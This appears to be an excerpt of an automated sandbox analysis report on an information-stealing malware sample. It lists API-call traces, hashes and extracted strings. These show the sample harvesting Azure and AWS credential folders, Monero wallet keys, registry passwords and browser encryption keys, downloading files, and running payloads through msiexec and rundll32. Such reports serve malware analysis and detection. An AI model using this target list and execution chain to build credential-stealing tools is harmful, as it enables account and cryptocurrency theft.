                                • Part of subcall function 00C5C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C5C87C
                              • StrStrA.SHLWAPI(?,007FDDA0,00000000,?,00C7145C,00000000,?,00000000,007F9278), ref: 00C5CD5A
                              • StrStrA.SHLWAPI(00000000,007F90C8), ref: 00C5CD71
                                • Part of subcall function 00C5C820: lstrcat.KERNEL32(?,00C70B46), ref: 00C5C943
                                • Part of subcall function 00C5C820: lstrcat.KERNEL32(?,00C70B47), ref: 00C5C957
                                • Part of subcall function 00C5C820: lstrcat.KERNEL32(?,00C70B4E), ref: 00C5C978
                              • lstrlen.KERNEL32(00000000), ref: 00C5CE44
                              • CloseHandle.KERNEL32(00000000), ref: 00C5CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 52797d0476c5b4c977346e6e9b29ada1723e84ad4985780e0f5af20c54c8f7e7
                              • Instruction ID: 748c76015661a527460e81f74d8be13b7ee307153c7b40e0fd7679ad4b55bcdd
                              • Opcode Fuzzy Hash: 52797d0476c5b4c977346e6e9b29ada1723e84ad4985780e0f5af20c54c8f7e7
                              • Instruction Fuzzy Hash: 5CE10C71810108AFDB24EBA4DC96FEEB778AF18300F54416AF50677191EF306A4ADFA1
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • RegOpenKeyExA.ADVAPI32(00000000,007FB188,00000000,00020019,00000000,00C705B6), ref: 00C683A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C68426
                              • wsprintfA.USER32 ref: 00C68459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C6847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C6848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00C68499
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 919814ea2dc7f456926228c88834ca99e5b573a1e8170ea1dc740b8f51291899
                              • Instruction ID: 1d59adbbcd9b5676d42221ae1616b211c206ef65a0893d544600bbf82462d0d2
                              • Opcode Fuzzy Hash: 919814ea2dc7f456926228c88834ca99e5b573a1e8170ea1dc740b8f51291899
                              • Instruction Fuzzy Hash: 4F81DC71910118AFDB24DB55CD95FEAB7B8FF48700F108299E109A6190DF71AB89CFD1
                              APIs
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00C64DCD
                                • Part of subcall function 00C64910: wsprintfA.USER32 ref: 00C6492C
                                • Part of subcall function 00C64910: FindFirstFileA.KERNEL32(?,?), ref: 00C64943
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00C64E59
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C70FDC), ref: 00C64971
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C70FE0), ref: 00C64987
                                • Part of subcall function 00C64910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C64B7D
                                • Part of subcall function 00C64910: FindClose.KERNEL32(000000FF), ref: 00C64B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C64EE5
                                • Part of subcall function 00C64910: wsprintfA.USER32 ref: 00C649B0
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C708D2), ref: 00C649C5
                                • Part of subcall function 00C64910: wsprintfA.USER32 ref: 00C649E2
                                • Part of subcall function 00C64910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C64A1E
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,007FE748), ref: 00C64A4A
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,00C70FF8), ref: 00C64A5C
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,?), ref: 00C64A70
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,00C70FFC), ref: 00C64A82
                                • Part of subcall function 00C64910: lstrcat.KERNEL32(?,?), ref: 00C64A96
                                • Part of subcall function 00C64910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C64AAC
                                • Part of subcall function 00C64910: DeleteFileA.KERNEL32(?), ref: 00C64B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 1fe76d7e30c854b2fcbe215beec08fb20b8d5aa0e1c47d8d4cd3574a3b056b9e
                              • Instruction ID: 448d1ade230c18d61f59926a3f89f9df7f794b5c981af556beade1e2bf34d6a7
                              • Opcode Fuzzy Hash: 1fe76d7e30c854b2fcbe215beec08fb20b8d5aa0e1c47d8d4cd3574a3b056b9e
                              • Instruction Fuzzy Hash: 2D41857A9502086BDB24F770DC8BFED7338AB64700F448465B949660C1EEB45BCD9B92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C6906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 34ac8494ed9b39dfec9361e14e64ec4fbb9753fefef7fc2557868223d28757b6
                              • Instruction ID: 7b51188ec88d38e2af1279057ef9a459cb4416fd21c2756ec437a371f4677d05
                              • Opcode Fuzzy Hash: 34ac8494ed9b39dfec9361e14e64ec4fbb9753fefef7fc2557868223d28757b6
                              • Instruction Fuzzy Hash: AF71EAB5910208AFDB14DFE5DC89FEEB7B8EF48300F14851AF515A7290DB34A949CBA1
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C631C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C6335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C634EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 247ff6d57e7c7db7be24a7abddc645788f80b474aa975990995abc6032f54298
                              • Instruction ID: fe138317acde8d4b22f5784e53033d047b11c6d5e3ff87e1d6388ef7bea87766
                              • Opcode Fuzzy Hash: 247ff6d57e7c7db7be24a7abddc645788f80b474aa975990995abc6032f54298
                              • Instruction Fuzzy Hash: 0A12DB718101089ADB29EFA0DDD2FEEB778AF18300F504169E50677191EF746B4ADFA2
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C56280: InternetOpenA.WININET(00C70DFE,00000001,00000000,00000000,00000000), ref: 00C562E1
                                • Part of subcall function 00C56280: StrCmpCA.SHLWAPI(?,007FE758), ref: 00C56303
                                • Part of subcall function 00C56280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C56335
                                • Part of subcall function 00C56280: HttpOpenRequestA.WININET(00000000,GET,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C56385
                                • Part of subcall function 00C56280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C563BF
                                • Part of subcall function 00C56280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C563D1
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C65318
                              • lstrlen.KERNEL32(00000000), ref: 00C6532F
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00C65364
                              • lstrlen.KERNEL32(00000000), ref: 00C65383
                              • lstrlen.KERNEL32(00000000), ref: 00C653AE
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              Memory Dump Source: same dump set as above (Source File 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset 00C50000, based on PE: true; Snapshot File hcaresult_0_2_c50000_file.jbxd)
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 52d1f60afdd3cd356d06d63d55215b3969fb749652e31469329ef6ae836dd80d
                              • Instruction ID: 7afebc953b8a551b1978888b65528cec6af9dd4e92a13855933e28727ab4f624
                              • Opcode Fuzzy Hash: 52d1f60afdd3cd356d06d63d55215b3969fb749652e31469329ef6ae836dd80d
                              • Instruction Fuzzy Hash: 6E51FE309101489BCB24FFA5CDD6AED7779AF14301F504029F90A6B592EF346B49EFA2
                              Memory Dump Source: same dump set as above (Source File 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset 00C50000, based on PE: true; Snapshot File hcaresult_0_2_c50000_file.jbxd)
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: c8314c45f606ac05b3112424eecee8c3fb155b690c98deb4fbe1641e300a9956
                              • Instruction ID: e7bb1d3d9a3777aedec050bf62fb29b3f8dbf7e4a4efac2d6b5cfa965e7f5135
                              • Opcode Fuzzy Hash: c8314c45f606ac05b3112424eecee8c3fb155b690c98deb4fbe1641e300a9956
                              • Instruction Fuzzy Hash: 88C198B59002199BCB24EF60DCD9FEE7378BF64304F044599F50AA7142DB70AA89DFA1
                              APIs
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C642EC
                              • lstrcat.KERNEL32(?,007FE410), ref: 00C6430B
                              • lstrcat.KERNEL32(?,?), ref: 00C6431F
                              • lstrcat.KERNEL32(?,007FD488), ref: 00C64333
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C68D90: GetFileAttributesA.KERNEL32(00000000,?,00C51B54,?,?,00C7564C,?,?,00C70E1F), ref: 00C68D9F
                                • Part of subcall function 00C59CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C59D39
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                                • Part of subcall function 00C693C0: GlobalAlloc.KERNEL32(00000000,00C643DD,00C643DD), ref: 00C693D3
                              • StrStrA.SHLWAPI(?,007FE1B8), ref: 00C643F3
                              • GlobalFree.KERNEL32(?), ref: 00C64512
                                • Part of subcall function 00C59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59AEF
                                • Part of subcall function 00C59AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C54EEE,00000000,?), ref: 00C59B01
                                • Part of subcall function 00C59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59B2A
                                • Part of subcall function 00C59AC0: LocalFree.KERNEL32(?,?,?,?,00C54EEE,00000000,?), ref: 00C59B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00C644A3
                              • StrCmpCA.SHLWAPI(?,00C708D1), ref: 00C644C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00C644D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00C644E5
                              • lstrcat.KERNEL32(00000000,00C70FB8), ref: 00C644F4
                              Memory Dump Source: same dump set as above (Source File 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset 00C50000, based on PE: true; Snapshot File hcaresult_0_2_c50000_file.jbxd)
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: c70c546af7b4de396dab4d6b0b8b6ecc6ebfa35022c554208f3fc87db6fef346
                              • Instruction ID: cc92b50e89f7a161fdb302d5951729f5df107c635e7c4fef055194edbb85ccb1
                              • Opcode Fuzzy Hash: c70c546af7b4de396dab4d6b0b8b6ecc6ebfa35022c554208f3fc87db6fef346
                              • Instruction Fuzzy Hash: 4D713AB6910208ABDF24EBA0DC8AFEE7379AF48300F044599F505A7181EA74DB49DF91
                              APIs
                                • Part of subcall function 00C512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C512B4
                                • Part of subcall function 00C512A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C512BB
                                • Part of subcall function 00C512A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C512D7
                                • Part of subcall function 00C512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C512F5
                                • Part of subcall function 00C512A0: RegCloseKey.ADVAPI32(?), ref: 00C512FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5134F
                              • lstrlen.KERNEL32(?), ref: 00C5135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00C51377
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C51465
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00C514EF
                              Memory Dump Source: same dump set as above (Source File 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset 00C50000, based on PE: true; Snapshot File hcaresult_0_2_c50000_file.jbxd)
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: b5e2f133e745b3434f4948aeeee8ed10ca323f2cc2bb0c457fa630c637fa52c4
                              • Instruction ID: d4dabf03ea4a24ffa277c4ad043325e0aadd1a3da1660884a7371f93b528d362
                              • Opcode Fuzzy Hash: b5e2f133e745b3434f4948aeeee8ed10ca323f2cc2bb0c457fa630c637fa52c4
                              • Instruction Fuzzy Hash: D15132B19501185BCB25FB60DDD6BED737CAF54300F4041A9B60A72082EF306B89DFA6
                              APIs
                                • Part of subcall function 00C572D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C5733A
                                • Part of subcall function 00C572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C573B1
                                • Part of subcall function 00C572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C5740D
                                • Part of subcall function 00C572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C57452
                                • Part of subcall function 00C572D0: HeapFree.KERNEL32(00000000), ref: 00C57459
                              • lstrcat.KERNEL32(00000000,00C717FC), ref: 00C57606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00C57648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00C5765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00C5768F
                              • lstrcat.KERNEL32(00000000,00C71804), ref: 00C576A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00C576D3
                              • lstrcat.KERNEL32(00000000,00C71808), ref: 00C576ED
                              • task.LIBCPMTD ref: 00C576FB
                              Memory Dump Source: same dump set as above (Source File 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset 00C50000, based on PE: true; Snapshot File hcaresult_0_2_c50000_file.jbxd)
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 4686e69fa734bc4e8246780cdab458b860d2e829744bb06b28c9740f2bb76716
                              • Instruction ID: 2af26f6e0d1e03d6def0e46ce9826229f853dce742d8b3726e58773737b5f748
                              • Opcode Fuzzy Hash: 4686e69fa734bc4e8246780cdab458b860d2e829744bb06b28c9740f2bb76716
                              • Instruction Fuzzy Hash: 48313075910109DFCB18EBB5DC8ADFF7374AF44302B18412AF502B7191DA34A98EDB95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,007FDFC0,00000000,?,00C70E2C,00000000,?,00000000), ref: 00C68130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C68137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C68158
                              • __aulldiv.LIBCMT ref: 00C68172
                              • __aulldiv.LIBCMT ref: 00C68180
                              • wsprintfA.USER32 ref: 00C681AC
                              Memory Dump Source: same dump set as above (Source File 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset 00C50000, based on PE: true; Snapshot File hcaresult_0_2_c50000_file.jbxd)
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 227f6eb1cd82d9b2555574357d1ab7f9cf255a579778d509dc844d39cefa5f25
                              • Instruction ID: d7d43946bbae3c549e08363f81e2c56495e28e7ebd65e9ac867443210a7d0da8
                              • Opcode Fuzzy Hash: 227f6eb1cd82d9b2555574357d1ab7f9cf255a579778d509dc844d39cefa5f25
                              • Instruction Fuzzy Hash: D9214AB1E44218ABDB10DFD5CC89FAEB7B8FB44B00F10421AF605BB280D77869058BA5
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                                • Part of subcall function 00C547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                              • InternetOpenA.WININET(00C70DF7,00000001,00000000,00000000,00000000), ref: 00C5610F
                              • StrCmpCA.SHLWAPI(?,007FE758), ref: 00C56147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C5618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C561B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00C561DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C5620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00C56249
                              • InternetCloseHandle.WININET(?), ref: 00C56253
